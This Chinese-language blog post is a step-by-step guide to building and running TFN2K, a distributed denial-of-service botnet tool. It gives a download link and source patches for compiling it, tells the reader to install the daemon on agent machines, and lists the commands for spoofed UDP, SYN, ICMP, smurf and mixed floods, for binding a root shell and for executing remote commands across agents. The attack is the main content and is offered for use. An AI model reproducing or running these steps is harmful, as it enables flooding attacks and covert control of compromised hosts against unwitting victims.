Requirement: CENTOS 6.5 版本或以上 (32bit)
攻击软件名称:TFN2K
什么是TFN2K?
TFN2K 的作者是著名的德国黑客mixter.
FN2K通过主控端利用大量代理端主机的资源进行对一个或多个目标进行协同攻击。当前互联网中的
UNIX、Solaris和Windows NT等平台的主机能被用于此类攻击,而且这个工具非常容易被移植到其它系统
平台上。
TFN2K由两部分组成:在主控端主机上的客户端和在代理端主机上的守护进程。主控端向其代理端发
送攻击指定的目标主机列表。代理端据此对目标进行拒绝服务攻击。由一个主控端控制的多个代理端主
机,能够在攻击过程中相互协同,保证攻击的连续性。主控央和代理端的网络通讯是经过加密的,还可
能混杂了许多虚假数据包。整个TFN2K网络可能使用不同的TCP、UDP或ICMP包进行通讯。而且主控端还能
伪造其IP地址。所有这些特性都使发展防御 TFN2K攻击的策略和技术都非常困难或效率低下。
如何使用TFN2K?
--------------
我的使用环境:Linux
必须安装开发包
yum groupinstall 'Development Tools'
软件下载链接
https://fivetrees.googlecode.com/files/tfn2k.tgz
1, 解压
tar zxvf tfn2k.tgz
cd tfn2k/src
2, 修改
a. src/Makefile (LINUX 用户请忽略)
如果你的系统是linux系统,不需要做任何修就可以, 如果你想生产Windows下的代理端,需要做一 些修改,但是我编译后的文件在Win2000 & WinXP下出错。
b. src/ip.h (请修改)
注释掉以下部分,否则编译出错。
/*struct in_addr
{
unsigned long int s_addr;
};*/
注意:是在这句语句前后加上/* */才能完全封锁该语句
c. 在/tfn2k/src/disk.c (请修改)
加入#include <stdlib.h>在最高位置
d. 在//tfn2k/src/aes.c (请修改)
最高位置加入#include <string.h>
注:这些配置修改是因为要避免一切的错误
3,编译
a. cd tfn2k
make
或者:
b. cd tfn2k/src
make
在提示设置密码后,会生成 tfn 和 td 两个文件,其中 tfn 是控制段,td 是守护进程。
4, 安装 td
自己去安装吧,需要root权限。
5, 攻击
a. 编辑一个文本文件,将安装了 td 的机器的ip地址添加进去, 格式为:
ip
ip
...
...
b. 测试代理端(可选)
./tfn -f host.txt -c 10 -i "mkdir /tmp/test_TFN2K"
检查安装了 td 的机器是否存在 /tmp/test_TFN2K 目录
c. ./tfn 列出命令的格式和参数
./tfn -f host -c 4 -i 1.1.1.1 对1.1.1.1发动 UDP flood 攻击
ID 1 -反欺骗级:服务器产生的DoS攻击总是来源于虚假的源地址。通过这个命令,你可以控制IP地址的哪些部分是虚假的,哪些部分是真实的IP。
ID 2 -改变包尺寸:缺省的ICMP/8,smurf,udp攻击缺省使用最小包。你可以通过改变每个包的有效载荷的字节增加它的大小。
ID 3 - 绑定root shell:启动一个会话服务,然后你连接一个指定端口就可以得到一个root shell。
ID 4 - UDP flood 攻击:这个攻击是利用这样一个事实:每个udp包被送往一个关闭的端口,这样就会有一个ICMP不可到达的信息返回,增加了攻击的能力。
ID5 - SYN flood 攻击:这个攻击有规律的送虚假的连接请求。结果会是目标端口拒绝服务,添瞒TCP连接表,通过对不存在主机的TCP/RST响应增加攻击潜力。
ID 6 - ICMP响应(ping)攻击:这个攻击发送虚假地址的ping请求,目标主机会回送相同大小的响应包。
ID 7 - SMURF 攻击:用目标主机的地址发送ping请求以广播扩大,这样目标主机将得到回复一个多倍的回复。
ID 8 - MIX攻击:按照1:1:1的关系交替的发送udp,syn,icmp包,这样就可以对付路由器,其它包转发设备,NIDS,sniffers等。
ID 9 -TARGA3攻击
ID 10 - 远程命令执行:给予单路在服务器上执行大量远程命令的机会。更复杂的用法请看4.1节。
更多的选项请看命令行帮助。
使用tfn用于分布式任务
Using TFN for other distributed tasks
依照CERT的安全报告,新版本的DDOS工具包含一个最新流行的特点:软件的自我更新。
TFN也有这个功能,作者并没有显式的包含这个功能。在ID 10远程执行命令中给予用户在任意数量远程主机上以批处理的形式执行同样shell命令的能力。这同时也证明了一个问题:DDOS等类似的分布式网络工具不仅仅简单的用于拒绝服务,还可以做许多实际的事情。
使用方法:
usage: ./tfn
[-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP.
Uses a random protocol as default
[-D n] Send out n bogus requests for each real one to decoy targets
[-S host/ip] Specify your source IP. Randomly spoofed by default, you need
to use your real IP if you are behind spoof-filtering routers
[-f hostlist] Filename containing a list of hosts with TFN servers to contact
[-h hostname] To contact only a single host running a TFN server
[-i target string] Contains options/targets separated by '@', see below
[-p port] A TCP destination port can be specified for SYN floods
<-c command ID> 0 - Halt all current floods on server(s) immediately
1 - Change IP antispoof-level (evade rfc2267 filtering)
usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)
2 - Change Packet size, usage: -i
3 - Bind root shell to a port, usage: -i
4 - UDP flood, usage: -i victim@victim2@victim3@...
5 - TCP/SYN flood, usage: -i victim@... [-p destination port]
6 - ICMP/PING flood, usage: -i victim@...
7 - ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@...
8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@...
9 - TARGA3 flood (IP stack penetration), usage: -i victim@...
10 - Blindly execute remote shell command, usage -i command
No comments:
Post a Comment